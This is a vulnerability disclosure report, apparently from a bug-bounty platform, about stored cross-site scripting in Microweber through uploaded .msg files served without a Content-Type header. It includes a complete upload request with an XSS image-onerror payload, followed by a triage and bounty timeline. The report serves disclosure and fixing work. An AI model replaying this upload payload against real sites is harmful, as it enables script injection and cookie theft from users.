Cross-site scripting - Stored via upload ".msg" file in microweber/microweber

Valid

Reported on

Apr 28th 2022


Description

When user upload file with .msg extension in white-list, but when access this file, server not reponse with Content-type header, so this file can execute javascript code as Content-type: text/html

Proof of Concept

POST /microweber/plupload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------28771568286742411163240611272
Content-Length: 613
Origin: http://localhost
Connection: close
Referer: http://localhost/microweber/admin/view:modules/load_module:users/edit-user:2
Cookie: lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; laravel_session=BnjV1FJreD5RFBkjkvb8pXOYFRSigS9UEohOssK0; csrf-token-data=%7B%22value%22%3A%22sgvKF9TERgDm9O13FiWEGxRvQFNAI8JvpRtqKnGo%22%2C%22expiry%22%3A1651144709625%7D; lang=en_US; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CZoRHz4Lp6Dw1kGoNmNjw8Bl9OnQxW9tsICXbPm45GY8PWB1MSkbLXzmWI5cV%7C%242y%2410%242mEkAOazLSPOHDj8x7C8ee06lkvn6Shka.Hdp6wt2g4k.j1maqtBS; back_to_admin=http%3A//localhost/microweber/admin/view%3Amodules/load_module%3Ausers/edit-user%3A2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------28771568286742411163240611272
Content-Disposition: form-data; name="name"

exploit.msg
-----------------------------28771568286742411163240611272
Content-Disposition: form-data; name="chunk"

0
-----------------------------28771568286742411163240611272
Content-Disposition: form-data; name="chunks"

1
-----------------------------28771568286742411163240611272
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<img src=x onerror=alert(window.origin) />
-----------------------------28771568286742411163240611272--

PoC Image

image image image

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

We are processing your report and will contact the microweber team within 24 hours. a month ago
We have contacted a member of the microweber team and are waiting to hear back 25 days ago
Peter Ivanov modified the Severity from High to Low 25 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability 25 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on 56c2db 25 days ago
Peter Ivanov has been awarded the fix bounty
Files.php#L1161 has been validated
Nhien.IT
22 days ago

Researcher


Hi @admin @maintainer,

Can I get CVE for this report?

to join this conversation